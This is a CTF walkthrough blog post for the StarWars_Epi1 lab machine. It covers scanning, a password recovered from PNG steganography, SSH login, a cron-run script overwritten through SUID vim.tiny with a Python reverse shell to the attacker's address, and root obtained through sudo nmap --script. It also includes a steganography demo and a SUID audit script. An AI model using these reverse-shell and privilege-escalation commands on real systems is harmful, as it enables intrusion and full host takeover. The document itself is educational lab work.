StarWars_Epi1_CTF target machine

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.147
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-30 06:54 EDT
Nmap scan report for 192.168.56.147
Host is up (0.00044s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:83:80:40 (Oracle VirtualBox virtual NIC)
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.56.147
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-30 06:54 EDT
Nmap scan report for 192.168.56.147
Host is up (0.00040s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 4c:53:4d:b2:26:ee:a5:10:d4:be:99:84:2a:9a:aa:11 (RSA)
| 256 95:d7:a4:e0:74:63:4b:08:b0:a8:8c:dc:e1:f8:91:25 (ECDSA)
|_ 256 1d:07:d1:3d:99:02:f0:04:ba:23:c3:a4:fd:0d:3d:91 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:83:80:40 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.56.147
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-30 06:55 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.147
Host is up (0.00025s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
| http-enum:
| /robots.txt: Robots file
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_ /manual/: Potentially interesting folder
MAC Address: 08:00:27:83:80:40 (Oracle VirtualBox virtual NIC)

Web penetration testing

Start with robots.txt

Why does the Jedi Order keep checking the robots.txt file.
Might take a look at /r2d2
He is the real OG.

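The text is rather messy. I searched for the first line and found nothing of value. It may also be meant as a wordlist, to try later if no other ideas come up.

These may be usernames or passwords, so note them down, then look at the wordpress directory.

Nothing gained from wordpress, so look at the admin directory.

There is nothing useful in the source, and the PHP file that handles login verification does not exist, so brute-forcing is not possible.

The web root has two images, one jpg and one png. The page source contains an encoded string. Trying Base64 decoding yields a binary string, and decoding that binary yields meaningful characters, but not the ones we need.

Look at the images directory.

One interesting detail: the png image is noticeably much larger than the jpg, so it may carry steganographically hidden information.

PNG image steganography

Test with the zsteg tool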

┌──(kali㉿kali)-[~/Downloads/StarWars_Epi1_CTF]
└─$ zsteg yoda.png
b1,b,lsb,xy .. file: OpenPGP Secret Key
b1,rgb,lsb,xy .. text: "the real password is babyYoda123"
b2,r,msb,xy .. text: "@@PTAT@U"
b2,bgr,msb,xy .. text: "Q@DEADET"
b2,rgba,lsb,xy .. text: "C{/'kk?'"
b3,b,lsb,xy .. text: "!$u86Kri4"
b4,r,msb,xy .. text: "A&W#Ff&b5!"
b4,g,lsb,xy .. text: "DhTS6BTgd107R'Vc"
b4,g,msb,xy .. text: "6%a0g!f&b5!"
b4,b,msb,xy .. text: "RdT% \"FD1a"
b4,rgb,lsb,xy .. text: "n,HnJJL&"
b4,rgb,msb,xy .. text: "CRfgvf'2\"cvU4#"
b4,bgr,lsb,xy .. text: ".hLNjJ,F"
b4,bgr,msb,xy .. text: "VBgvfg6\"#rfT%3"
b4,rgba,lsb,xy .. text: "so/O@OPo.O"
b4,abgr,msb,xy .. text: "S/7_&?a_B"

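That gives us the password. The site's login page cannot actually perform verification, so the only place left to consider is port 22. We have also collected two strings, han and skywalker, which are probably usernames.

SSH login

Next I manually tried r2d2, root, skywalker and han; han logged in successfully.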
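
What a one-bit-per-channel RGB channel such as the `b1,rgb,lsb,xy` line in the zsteg output amounts to, shown on constructed pixel data. This is an added example, not code from the original write-up; the function names, the synthetic cover image and the MSB-first packing of extracted bits are assumptions of the example.

```python
# Added illustration, not code from the original write-up.
# Assumption: bits are read from R, G, B of each pixel in row-major order
# and packed most-significant-bit first into bytes.

def embed_lsb(pixels, message):
    """Return a copy of pixels with the message bits written into bit 0."""
    bits = [(byte >> s) & 1 for byte in message for s in range(7, -1, -1)]
    if len(bits) > len(pixels) * 3:
        raise ValueError("cover image too small for message")
    out, i = [], 0
    for px in pixels:
        channels = list(px)
        for c in range(3):
            if i < len(bits):
                channels[c] = (channels[c] & 0xFE) | bits[i]
                i += 1
        out.append(tuple(channels))
    return out


def extract_lsb(pixels, channels=(0, 1, 2)):
    """Collect bit 0 of the chosen channels and pack the bits into bytes."""
    bits = [(px[c] & 1) for px in pixels for c in channels]
    data = bytearray()
    for i in range(0, len(bits) - 7, 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        data.append(byte)
    return bytes(data)


def printable_prefix(data, min_len=8):
    """Leading run of printable ASCII, or '' if shorter than min_len."""
    end = 0
    while end < len(data) and 32 <= data[end] < 127:
        end += 1
    return data[:end].decode("ascii") if end >= min_len else ""


def max_channel_delta(a, b):
    """Largest per-channel difference between two pixel lists."""
    return max(abs(x - y) for p, q in zip(a, b) for x, y in zip(p, q))


# Constructed 16x16 cover "image" (a synthetic pattern, not data from the page).
COVER = [((x * 13 + y) % 256, (x + y * 7) % 256, (x * y) % 256)
         for y in range(16) for x in range(16)]
STEGO = embed_lsb(COVER, b"constructed sample secret\x00")

if __name__ == "__main__":
    print(printable_prefix(extract_lsb(STEGO)))
    print(max_channel_delta(COVER, STEGO))
```

No channel value moves by more than 1, which is why the carrier image looks unchanged and only tooling that reads the low bit planes recovers the text.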

┌──(kali㉿kali)-[~/Downloads/StarWars_Epi1_CTF]
└─$ ssh han@192.168.56.147
han@192.168.56.147's password:
Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 23 08:18:42 2020 from ::1
han@starwars:~$ whoami
han
han@starwars:~$ id
uid=1000(han) gid=1000(han) groups=1000(han)
han@starwars:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:83:80:40 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.147/24 brd 192.168.56.255 scope global dynamic noprefixroute enp0s3
valid_lft 334sec preferred_lft 334sec
inet6 fe80::a00:27ff:fe83:8040/64 scope link noprefixroute
valid_lft forever preferred_lft forever
han@starwars:~$ uname -a
Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
han@starwars:~$ sudo -l
[sudo] password for han:
Sorry, user han may not run sudo on starwars.

Check whether the user's home directory contains sensitive files

han@starwars:~$ ls -alih
total 32K
170 drwxr-xr-x 4 han han 4.0K Jul 23 2020 .
193 drwxr-xr-x 5 root root 4.0K Jul 23 2020 ..
43122 -rw------- 1 han han 483 Jul 24 2020 .bash_history
38236 -rw-r--r-- 1 han han 220 Apr 18 2019 .bash_logout
1748 -rw-r--r-- 1 han han 3.5K Apr 18 2019 .bashrc
42430 drwx------ 3 han han 4.0K Jul 23 2020 .gnupg
1261 -rw-r--r-- 1 han han 807 Apr 18 2019 .profile
41082 drwxr-xr-x 2 han han 4.0K Jul 24 2020 .secrets

Focus on the command history file and the .secrets folder

han@starwars:~$ cat .bash_history 
sudo su
ls -al
mkdir .secrets
ls
ls -al
cd .secrets/
ls -al
touch firsthalf.txt
touch note.txt
echo first half of the password is: luke12 >> firsthalf.txt
cat firsthalf.txt
echo Darth knows everything >> note.txt
exit
cd .secrets/
cat firsthalf.txt
exit
ls
cd .secrets/
ls
rm firsthalf.txt
cat note.txt
echo "r2d2 thinks you're a cewl kid, what about anakin?" > note.txt
cat note.txt
echo "Anakin is a cewl kid." > note.txt
cat note.txt
cd ..
su Darth
sudo -l
su Darth

han@starwars:~$ cd .secrets/
han@starwars:~/.secrets$ ls -alih
total 12K
41082 drwxr-xr-x 2 han han 4.0K Jul 24 2020 .
170 drwxr-xr-x 4 han han 4.0K Jul 23 2020 ..
43245 -rw-r----- 1 han han 22 Jul 24 2020 note.txt
han@starwars:~/.secrets$ cat note.txt
Anakin is a cewl kid.

We now have the first half of the password and the hint "Anakin is a cewl kid." Next, look at the other users' home directories.

han@starwars:~/.secrets$ cd /home/Darth
han@starwars:/home/Darth$ ls -alih
total 44K
43137 drwxr-xr-x 5 Darth Darth 4.0K Jul 24 2020 .
193 drwxr-xr-x 5 root root 4.0K Jul 23 2020 ..
43125 -rw------- 1 Darth Darth 2.3K Jul 24 2020 .bash_history
43304 -rw-r--r-- 1 Darth Darth 220 Apr 18 2019 .bash_logout
43303 -rw-r--r-- 1 Darth Darth 3.5K Apr 18 2019 .bashrc
43305 drwx------ 3 Darth Darth 4.0K Jul 23 2020 .gnupg
1419 -rw------- 1 Darth Darth 42 Jul 24 2020 .lesshst
1415 drwxr-xr-x 3 Darth Darth 4.0K Jul 24 2020 .local
43302 -rw-r--r-- 1 Darth Darth 807 Apr 18 2019 .profile
1420 drwxr-xr-x 2 Darth Darth 4.0K Jul 24 2020 .secrets
1414 -rw-r--r-- 1 Darth Darth 66 Jul 24 2020 .selected_editor
han@starwars:/home/Darth$ cd .secrets/
han@starwars:/home/Darth/.secrets$ ls -alih
total 12K
1420 drwxr-xr-x 2 Darth Darth 4.0K Jul 24 2020 .
43137 drwxr-xr-x 5 Darth Darth 4.0K Jul 24 2020 ..
1425 -rwxrw-r-- 1 Darth anakin 105 Jul 24 2020 evil.py
han@starwars:/home/Darth/.secrets$ cat evil.py
# Let the fear flow through you every single minute

fear = 1
anger = fear
hate = anger
suffering = hate

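Darth has a script that runs as a scheduled task every minute, which may be exploitable, but only users in the anakin group can modify the file; I can only read it. Upload pspy to confirm that the scheduled script really runs.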

2023/10/02 08:12:01 CMD: UID=0     PID=17682  | /usr/sbin/CRON -f 
2023/10/02 08:12:01 CMD: UID=0 PID=17683 | /usr/sbin/CRON -f
2023/10/02 08:12:01 CMD: UID=1002 PID=17684 | /bin/sh -c python /home/Darth/.secrets/evil.py

Look at skywalker's home directory

han@starwars:/home/skywalker$ cd .secrets/
han@starwars:/home/skywalker/.secrets$ ls -laih
total 12K
43115 drwxr-xr-x 2 skywalker skywalker 4.0K Jul 24 2020 .
37181 drwxr-xr-x 5 skywalker skywalker 4.0K Jul 24 2020 ..
39574 -rw-r----- 1 skywalker skywalker 50 Jul 24 2020 note.txt
han@starwars:/home/skywalker/.secrets$ cat note.txt
cat: note.txt: Permission denied

No read permission, so go and look at the web root

han@starwars:/tmp$ cd /var/www/html
han@starwars:/var/www/html$ ls
admin images index.html r2d2 robots.txt users.js wordpress
han@starwars:/var/www/html$ cd wordpress
-bash: cd: wordpress: Not a directory
han@starwars:/var/www/html$ ls -alih
total 36K
8085 drwxr-xr-x 3 root root 4.0K Jul 25 2020 .
8084 drwxr-xr-x 3 root root 4.0K Jul 20 2020 ..
37079 -rw-r--r-- 1 root root 3.7K Jul 23 2020 admin
36973 drwxr-xr-x 2 root root 4.0K Jul 23 2020 images
36309 -rw-r--r-- 1 root root 548 Jul 23 2020 index.html
42292 -rw-r--r-- 1 root root 3.3K Jul 23 2020 r2d2
39330 -rw-r--r-- 1 root root 105 Jul 23 2020 robots.txt
41183 -rw-r--r-- 1 root root 16 Jul 23 2020 users.js
41060 -rw-r--r-- 1 root root 54 Jul 23 2020 wordpress

Check SUID files and scheduled tasks

han@starwars:/var$ find / -type f -perm -04000 -ls 2>/dev/null
147279 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
143107 52 -rwsr-xr-- 1 root messagebus 51184 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
390885 16 -rwsr-sr-x 1 root root 14608 Mar 5 2019 /usr/lib/xorg/Xorg.wrap
264227 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
143141 20 -rwsr-xr-x 1 root root 18888 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
129321 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
129319 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
132702 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
133176 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
143139 24 -rwsr-xr-x 1 root root 23288 Jan 15 2019 /usr/bin/pkexec
156384 56 -rwsr-xr-x 1 root root 55400 Mar 6 2019 /usr/bin/bwrap
132849 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
136952 1176 -rwsrwsrwx 1 root root 1200696 Jun 15 2019 /usr/bin/vim.tiny
143296 36 -rwsr-xr-x 1 root root 34896 Apr 22 2020 /usr/bin/fusermount
176421 2844 -rwsr-xr-x 1 root root 2911160 Dec 12 2018 /usr/bin/nmap
133174 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
129322 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
129318 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
143313 152 -rwsr-xr-x 1 root root 154352 Mar 21 2019 /usr/bin/ntfs-3g
173131 156 -rwsr-xr-x 1 root root 157192 Feb 2 2020 /usr/bin/sudo
172781 380 -rwsr-xr-- 1 root dip 386792 Feb 20 2020 /usr/sbin/pppd

han@starwars:/home/Darth/.secrets$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

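Among the SUID binaries, vim.tiny and nmap may be exploitable.

They may allow reading and writing files that we otherwise have no permission to read or write.

Using SUID vim to rewrite the scheduled script for a reverse shell

Try modifying evil.py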
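
The same observation as an audit check a defender could run over `find / -type f -perm -04000 -ls` output. This is an added example, not part of the original write-up; the allowlist contents and the function and variable names are assumptions, and the sample lines are copied from the find output above.

```python
# Added illustration: triage `find / -type f -perm -04000 -ls` output.
import re

# Assumption: a site-maintained allowlist of binaries expected to be setuid
# on this host; the entries below are a subset chosen for the example.
EXPECTED_SUID = {
    "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/lib/openssh/ssh-keysign",
}

# Fields: inode blocks mode links owner group size <date fields> path
# (paths containing whitespace are not handled by this pattern)
LINE = re.compile(
    r"^\s*\d+\s+\d+\s+(?P<mode>[-dlbcps][-rwxsStT]{9})\s+\d+\s+"
    r"(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+.*?\s(?P<path>/\S+)$"
)


def audit(find_ls_output, expected=EXPECTED_SUID):
    """Return {path: [reasons]} for setuid files that deserve review."""
    findings = {}
    for line in find_ls_output.splitlines():
        m = LINE.match(line)
        if not m or m["mode"][3] not in "sS":
            continue  # unparsable line, or owner setuid bit not set
        mode, path, reasons = m["mode"], m["path"], []
        if mode[8] == "w":
            reasons.append("world-writable setuid file")
        if mode[5] == "w" and m["group"] != m["owner"]:
            reasons.append("group-writable by " + m["group"])
        if path not in expected:
            reasons.append("not in expected setuid allowlist")
        if reasons:
            findings[path] = reasons
    return findings


# Lines copied from the find output on this page.
SAMPLE = """\
132849 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
136952 1176 -rwsrwsrwx 1 root root 1200696 Jun 15 2019 /usr/bin/vim.tiny
176421 2844 -rwsr-xr-x 1 root root 2911160 Dec 12 2018 /usr/bin/nmap
129322 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
"""

if __name__ == "__main__":
    for path, reasons in audit(SAMPLE).items():
        print(path, "->", "; ".join(reasons))
```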

han@starwars:/home/Darth/.secrets$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.106",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' > evil.py
-bash: evil.py: Permission denied
han@starwars:/home/Darth/.secrets$ vim.tiny evil.py
han@starwars:/home/Darth/.secrets$ cat evil.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.106",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

Start the listener beforehand

┌──(kali㉿kali)-[~/Downloads/StarWars_Epi1_CTF]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.147] 37906
$ whoami
whoami
Darth
$ id
id
uid=1002(Darth) gid=1002(Darth) groups=1002(Darth),27(sudo),2000(anakin)
$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
Darth@starwars:~$ ls -alih
ls -alih
total 44K
43137 drwxr-xr-x 5 Darth Darth 4.0K Jul 24 2020 .
193 drwxr-xr-x 5 root root 4.0K Jul 23 2020 ..
43125 -rw------- 1 Darth Darth 2.3K Jul 24 2020 .bash_history
43304 -rw-r--r-- 1 Darth Darth 220 Apr 18 2019 .bash_logout
43303 -rw-r--r-- 1 Darth Darth 3.5K Apr 18 2019 .bashrc
43305 drwx------ 3 Darth Darth 4.0K Jul 23 2020 .gnupg
1419 -rw------- 1 Darth Darth 42 Jul 24 2020 .lesshst
1415 drwxr-xr-x 3 Darth Darth 4.0K Jul 24 2020 .local
43302 -rw-r--r-- 1 Darth Darth 807 Apr 18 2019 .profile
1420 drwxr-xr-x 2 Darth Darth 4.0K Oct 2 09:26 .secrets
1414 -rw-r--r-- 1 Darth Darth 66 Jul 24 2020 .selected_editor
Darth@starwars:~$ sudo -l
sudo -l
Matching Defaults entries for Darth on starwars:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User Darth may run the following commands on starwars:
(ALL) NOPASSWD: /usr/bin/nmap

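sudo nmap privilege escalation

Consult GTFOBins for the privilege-escalation technique. The --interactive option is not supported by this version, so escalate by having nmap run a script we control.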

Darth@starwars:~$ sudo /usr/bin/nmap --interactive
sudo /usr/bin/nmap --interactive
/usr/bin/nmap: unrecognized option '--interactive'
See the output of nmap -h for a summary of options.
Darth@starwars:~$ cd /tmp
cd /tmp
Darth@starwars:/tmp$ ls
ls
pulse-PKdhtXMmr18n
systemd-private-88d98199aeff4b95840bfa9330947e54-apache2.service-v542CT
systemd-private-88d98199aeff4b95840bfa9330947e54-ModemManager.service-HniTNs
systemd-private-88d98199aeff4b95840bfa9330947e54-systemd-timesyncd.service-K1oC4C
Darth@starwars:/tmp$ echo 'os.execute("/bin/sh")' > test
echo 'os.execute("/bin/sh")' > test
Darth@starwars:/tmp$ sudo /usr/bin/nmap --script=test
sudo /usr/bin/nmap --script=test
Starting Nmap 7.70 ( https://nmap.org ) at 2023-10-02 09:29 EDT
NSE: Warning: Loading 'test' -- the recommended file extension is '.nse'.
# whoami
root

Find the flag

# id
uid=0(root) gid=0(root) groups=0(root)
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:83:80:40 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.147/24 brd 192.168.56.255 scope global dynamic noprefixroute enp0s3
valid_lft 364sec preferred_lft 364sec
inet6 fe80::a00:27ff:fe83:8040/64 scope link noprefixroute
valid_lft forever preferred_lft forever
# uname -a
Linux starwars 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
# cd /root
# ls -liah
total 376K
195 drwx------ 16 root root 4.0K Jul 25 2020 .
2 drwxr-xr-x 19 root root 4.0K Jul 20 2020 ..
1258 -rw------- 1 root root 4.4K Jul 24 2020 .bash_history
247 -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
142 drwx------ 6 root root 4.0K Jul 22 2020 .cache
175 drwxr-xr-x 7 root root 4.0K Jul 23 2020 .config
209 drwxr-xr-x 2 root root 4.0K Jul 23 2020 Desktop
148 -rw-r--r-- 1 root root 35 Jul 20 2020 .dmrc
258 drwxr-xr-x 2 root root 4.0K Jul 20 2020 Documents
210 drwxr-xr-x 2 root root 4.0K Jul 22 2020 Downloads
37235 -rw-r--r-- 1 root root 793 Jul 23 2020 flag.txt
171 drwx------ 3 root root 4.0K Jul 20 2020 .gnupg
1438 -rw------- 1 root root 2.6K Jul 25 2020 .ICEauthority
404 drwxr-xr-x 3 root root 4.0K Jul 20 2020 .local
1250 drwx------ 5 root root 4.0K Jul 22 2020 .mozilla
265 drwxr-xr-x 2 root root 4.0K Jul 20 2020 Music
1273 -rw-r--r-- 1 root root 240K Jul 24 2020 nmap-4.53.tar.bz2.2
297 drwxr-xr-x 2 root root 4.0K Jul 20 2020 Pictures
246 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
254 drwxr-xr-x 2 root root 4.0K Jul 20 2020 Public
36714 drwx------ 2 root root 4.0K Jul 22 2020 .ssh
212 drwxr-xr-x 2 root root 4.0K Jul 20 2020 Templates
308 drwxr-xr-x 2 root root 4.0K Jul 20 2020 Videos
173 -rw------- 1 root root 53 Jul 25 2020 .Xauthority
518 -rw-r--r-- 1 root root 11K Jul 25 2020 .xfce4-session.verbose-log
474 -rw-r--r-- 1 root root 19K Jul 24 2020 .xfce4-session.verbose-log.last
1271 -rw------- 1 root root 3.0K Jul 25 2020 .xsession-errors
174 -rw------- 1 root root 3.4K Jul 24 2020 .xsession-errors.old
# cat flag.txt
.-.
|_:_|
/(_Y_)\
. ( \/M\/ )
'. _.'-/'-'\-'._
': _/.--'[[[[]'--.\_
': /_' : |::"| : '.\
': // ./ |oUU| \.' :\
': _:'..' \_|___|_/ : :|
':. .' |_[___]_| :.':\
[::\ | : | | : ; : \
'-' \/'.| |.' \ .;.' |
|\_ \ '-' : |
| \ \ .: : | |
| \ | '. : \ |
/ \ :. .; |
/ | | :__/ : \\
| | | \: | \ | ||
/ \ : : |: / |__| /|
snd | : : :_/_| /'._\ '--|_\
/___.-/_|-' \ \
'-'

I hope you liked it Padawan :)

StarWars_Epi1_CTF target machine
https://i3eg1nner.github.io/2023/09/177299db5791.html
Author: I3eg1nner
Published: September 30, 2023